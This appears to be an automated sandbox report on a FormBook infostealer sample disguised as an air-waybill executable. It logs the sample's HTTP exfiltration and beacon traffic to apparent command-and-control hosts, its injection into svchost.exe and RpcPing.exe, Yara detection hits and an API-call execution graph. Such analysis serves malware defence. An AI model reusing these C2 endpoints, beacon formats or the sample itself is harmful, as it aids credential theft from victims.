                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:43.791742086 CEST  580                IN         HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:43 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                            56          192.168.11.20  49831        74.208.236.230  80
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jul 3, 2024 17:41:46.335351944 CEST  1289               OUT        POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:46.335401058 CEST  2578               OUT
                                                            Jul 3, 2024 17:41:46.335453033 CEST  9023               OUT
                                                            Jul 3, 2024 17:41:46.467875957 CEST  1289               OUT
                                                            Jul 3, 2024 17:41:46.467924118 CEST  5156               OUT
                                                            Jul 3, 2024 17:41:46.467976093 CEST  5156               OUT
                                                            Jul 3, 2024 17:41:46.468142986 CEST  6445               OUT
                                                            Jul 3, 2024 17:41:46.468313932 CEST  7734               OUT
                                                            Jul 3, 2024 17:41:46.600270987 CEST  1289               OUT
                                                            Jul 3, 2024 17:41:46.600321054 CEST  3867               OUT
                                                            Jul 3, 2024 17:41:46.600541115 CEST  9714               OUT
                                                            Jul 3, 2024 17:41:46.738563061 CEST  580                IN         HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:46 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                            57          192.168.11.20  49832        74.208.236.230  80
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jul 3, 2024 17:41:49.018291950 CEST  527                OUT        GET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:49.156029940 CEST  770                IN         HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:49 GMT
                                                            Server: Apache
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                            58          192.168.11.20  49833        199.59.243.226  80
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jul 3, 2024 17:41:54.322752953 CEST  785                OUT        POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:54.462959051 CEST  1289               IN         HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:54 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 191e9db4-e790-483e-b99a-5625e57fee7a
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=191e9db4-e790-483e-b99a-5625e57fee7a; expires=Wed, 03 Jul 2024 15:56:54 GMT; path=/
                                                            connection: close
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:41:54.462980032 CEST  518                IN
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTkxZTlkYjQtZTc5MC00ODNlLWI5OWEtNTYyNWU1N2ZlZTdhIiwicGFnZV90aW1lIjoxNzIwMDIxMzE0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                            59          192.168.11.20  49834        199.59.243.226  80
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jul 3, 2024 17:41:56.990092993 CEST  1125               OUT        POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:57.130173922 CEST  1289               IN         HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:56 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 07eeebbc-1c93-476d-8d7c-99d0af15cd3e
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=07eeebbc-1c93-476d-8d7c-99d0af15cd3e; expires=Wed, 03 Jul 2024 15:56:57 GMT; path=/
                                                            connection: close
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:41:57.130189896 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDdlZWViYmMtMWM5My00NzZkLThkN2MtOTlkMGFmMTVjZDNlIiwicGFnZV90aW1lIjoxNzIwMDIxMzE3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            60 | 192.168.11.20 | 49835 | 199.59.243.226 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:59.662462950 CEST | 1289 | OUT | POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:42:00.039623022 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:59 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 12225b8d-c1e5-482f-a122-1e3a8ac385a2
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=12225b8d-c1e5-482f-a122-1e3a8ac385a2; expires=Wed, 03 Jul 2024 15:56:59 GMT; path=/
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            61 | 192.168.11.20 | 49836 | 199.59.243.226 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:42:02.330769062 CEST | 521 | OUT | GET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:42:02.473639965 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:42:02 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1466
                                                            x-request-id: 08e83773-d4e6-4b89-8c23-8b813220a2e2
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==
                                                            set-cookie: parking_session=08e83773-d4e6-4b89-8c23-8b813220a2e2; expires=Wed, 03 Jul 2024 15:57:02 GMT; path=/
                                                            connection: close



                                                            Target ID:0
                                                            Start time:11:33:48
                                                            Start date:03/07/2024
                                                            Path:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
                                                            Imagebase:0x400000
                                                            File size:1'182'720 bytes
                                                            MD5 hash:D0AA9DAE95EF6311340A157817230BF0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:11:33:49
                                                            Start date:03/07/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
                                                            Imagebase:0xc80000
                                                            File size:47'016 bytes
                                                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:11:34:21
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe"
                                                            Imagebase:0x510000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:4
                                                            Start time:11:34:23
                                                            Start date:03/07/2024
                                                            Path:C:\Windows\SysWOW64\RpcPing.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                            Imagebase:0x4b0000
                                                            File size:26'624 bytes
                                                            MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:11:34:44
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe"
                                                            Imagebase:0x510000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:11:35:06
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff710750000
                                                            File size:597'432 bytes
                                                            MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:183
97911->97905 97916 435b09 GetCurrentProcess TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent 97913->97916 97915 435c3d 97915->97905 97916->97915 97918 42a714 EncodePointer 97917->97918 97918->97918 97919 42a72e 97918->97919 97919->97795 97923 422e84 97920->97923 97922 422f8b 97922->97797 97924 422e90 97923->97924 97931 423457 97924->97931 97930 422eb7 97930->97922 97932 429e4b 58 API calls 97931->97932 97933 422e99 97932->97933 97934 422ec8 DecodePointer DecodePointer 97933->97934 97935 422ea5 97934->97935 97936 422ef5 97934->97936 97945 422ec2 97935->97945 97936->97935 97948 4289e4 59 API calls 97936->97948 97938 422f07 97939 422f58 EncodePointer EncodePointer 97938->97939 97941 422f2c 97938->97941 97949 428aa4 61 API calls 97938->97949 97939->97935 97941->97935 97943 422f46 EncodePointer 97941->97943 97950 428aa4 61 API calls 97941->97950 97943->97939 97944 422f40 97944->97935 97944->97943 97951 423460 97945->97951 97948->97938 97949->97941 97950->97944 97954 429fb5 LeaveCriticalSection 97951->97954 97953 422ec7 97953->97930 97954->97953 97956 429e4b 58 API calls 97955->97956 97957 4235b7 DecodePointer EncodePointer 97956->97957 98020 429fb5 LeaveCriticalSection 97957->98020 97959 4049a7 97960 423614 97959->97960 97961 423638 97960->97961 97962 42361e 97960->97962 97961->97804 97962->97961 98021 428d68 58 API calls 97962->98021 97964 423628 98022 428ff6 9 API calls 97964->98022 97966 423633 97966->97804 97967->97806 97969 403b59 97968->97969 98023 4077c7 97969->98023 97973 403b8c IsDebuggerPresent 97974 403b9a 97973->97974 97975 43d4ad MessageBoxA 97973->97975 97976 403c73 97974->97976 97978 43d4c7 97974->97978 97979 403bb7 97974->97979 97975->97978 97977 403c7a SetCurrentDirectoryW 97976->97977 97982 403c87 97977->97982 98247 407373 59 API calls 97978->98247 98109 4073e5 97979->98109 97982->97808 97983 43d4d7 97988 43d4ed SetCurrentDirectoryW 97983->97988 97985 403bd5 GetFullPathNameW 98125 407d2c 97985->98125 97987 403c10 
98134 410a8d 97987->98134 97988->97982 97991 403c2e 97992 403c38 97991->97992 98248 464c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97991->98248 98150 403a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97992->98150 97995 43d50a 97995->97992 97999 43d51b 97995->97999 97998 403c42 98000 403c55 97998->98000 98158 4043db 97998->98158 98249 404864 97999->98249 98169 410b30 98000->98169 98002 43d523 98256 407f41 98002->98256 98020->97959 98021->97964 98022->97966 98276 420ff6 98023->98276 98025 4077e8 98026 420ff6 59 API calls 98025->98026 98027 403b63 GetCurrentDirectoryW 98026->98027 98028 403778 98027->98028 98029 4077c7 59 API calls 98028->98029 98030 40378e 98029->98030 98314 403d43 98030->98314 98032 4037ac 98033 404864 61 API calls 98032->98033 98034 4037c0 98033->98034 98035 407f41 59 API calls 98034->98035 98036 4037cd 98035->98036 98328 404f3d 98036->98328 98039 43d3ae 98399 4697e5 98039->98399 98040 4037ee 98352 4081a7 98040->98352 98043 43d3cd 98046 422f95 58 API calls 98043->98046 98048 43d3da 98046->98048 98050 404faa 84 API calls 98048->98050 98052 43d3e3 98050->98052 98056 403ee2 59 API calls 98052->98056 98053 407f41 59 API calls 98054 40381a 98053->98054 98359 408620 98054->98359 98058 43d3fe 98056->98058 98057 40382c 98059 407f41 59 API calls 98057->98059 98060 403ee2 59 API calls 98058->98060 98061 403852 98059->98061 98062 43d41a 98060->98062 98063 408620 69 API calls 98061->98063 98064 404864 61 API calls 98062->98064 98066 403861 98063->98066 98065 43d43f 98064->98065 98067 403ee2 59 API calls 98065->98067 98069 4077c7 59 API calls 98066->98069 98068 43d44b 98067->98068 98070 4081a7 59 API calls 98068->98070 98071 40387f 98069->98071 98072 43d459 98070->98072 98363 403ee2 98071->98363 98074 403ee2 59 API calls 98072->98074 98076 43d468 98074->98076 98082 4081a7 59 API calls 98076->98082 98078 403899 98078->98052 98079 4038a3 98078->98079 98080 42313d 60 API calls 98079->98080 98081 4038ae 98080->98081 98081->98058 98083 
4038b8 98081->98083 98084 43d48a 98082->98084 98085 42313d 60 API calls 98083->98085 98086 403ee2 59 API calls 98084->98086 98087 4038c3 98085->98087 98088 43d497 98086->98088 98087->98062 98089 4038cd 98087->98089 98088->98088 98090 42313d 60 API calls 98089->98090 98091 4038d8 98090->98091 98091->98076 98092 403919 98091->98092 98094 403ee2 59 API calls 98091->98094 98092->98076 98093 403926 98092->98093 98379 40942e 98093->98379 98096 4038fc 98094->98096 98098 4081a7 59 API calls 98096->98098 98100 40390a 98098->98100 98102 403ee2 59 API calls 98100->98102 98102->98092 98104 4093ea 59 API calls 98106 403961 98104->98106 98105 409040 60 API calls 98105->98106 98106->98104 98106->98105 98107 403ee2 59 API calls 98106->98107 98108 4039a7 98106->98108 98107->98106 98108->97973 98110 4073f2 98109->98110 98111 43ee4b 98110->98111 98112 40740b 98110->98112 98114 43ee67 GetOpenFileNameW 98111->98114 99194 4048ae 98112->99194 98116 43eeb6 98114->98116 98118 407d2c 59 API calls 98116->98118 98120 43eecb 98118->98120 98120->98120 98122 407429 99222 4069ca 98122->99222 98126 407da5 98125->98126 98127 407d38 98125->98127 98128 407e8c 59 API calls 98126->98128 98129 407d73 98127->98129 98130 407d4e 98127->98130 98133 407d56 98128->98133 98131 408189 59 API calls 98129->98131 99552 408087 59 API calls 98130->99552 98131->98133 98133->97987 98135 410a9a 98134->98135 99553 406ee0 98135->99553 98137 410a9f 98149 403c26 98137->98149 99564 4112fe 89 API calls 98137->99564 98139 410aac 98139->98149 99565 414047 91 API calls 98139->99565 98141 410ab5 98142 410ab9 GetFullPathNameW 98141->98142 98141->98149 98143 407d2c 59 API calls 98142->98143 98144 410ae5 98143->98144 98145 407d2c 59 API calls 98144->98145 98146 410af2 98145->98146 98147 4450d5 98146->98147 98148 407d2c 59 API calls 98146->98148 98148->98149 98149->97983 98149->97991 98151 403ac2 LoadImageW RegisterClassExW 98150->98151 98152 43d49c 98150->98152 99604 403041 7 API calls 98151->99604 99605 4048fe LoadImageW 
EnumResourceNamesW 98152->99605 98155 403b46 98157 4039e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98155->98157 98156 43d4a5 98157->97998 98159 404406 98158->98159 99606 404213 98159->99606 98167 40448b 98170 4450ed 98169->98170 98184 410b55 98169->98184 99695 46a0b5 89 API calls 98170->99695 98177 410bab PeekMessageW 98245 410b65 98177->98245 98181 4452ab Sleep 98181->98245 98183 410e44 98184->98245 99696 409fbd 60 API calls 98184->99696 99697 4568bf 341 API calls 98184->99697 98188 410fa3 PeekMessageW 98188->98245 98189 410fbf TranslateMessage DispatchMessageW 98189->98188 98190 44517a TranslateAcceleratorW 98190->98188 98190->98245 98191 420ff6 59 API calls 98191->98245 98192 410e73 timeGetTime 98192->98245 98193 445c49 WaitForSingleObject 98193->98245 98196 410fdd Sleep 98229 410fee 98196->98229 98197 4081a7 59 API calls 98197->98245 98199 445f22 Sleep 98199->98229 98201 40b89c 314 API calls 98201->98245 98204 4110ae timeGetTime 98222 409fbd 60 API calls 98222->98245 98225 40a000 314 API calls 98225->98245 98230 4110f5 98229->98230 98229->98245 98232 46a0b5 89 API calls 98232->98245 98234 409df0 59 API calls 98234->98245 98235 408620 69 API calls 98235->98245 98237 4566f4 59 API calls 98237->98245 98238 4459ff VariantClear 98238->98245 98239 445a95 VariantClear 98239->98245 98240 408e34 59 API calls 98240->98245 98241 445843 VariantClear 98241->98245 98242 457405 59 API calls 98242->98245 98243 407f41 59 API calls 98243->98245 98244 408b13 69 API calls 98244->98245 98245->98177 98245->98181 98245->98183 98245->98188 98245->98189 98245->98190 98245->98191 98245->98192 98245->98193 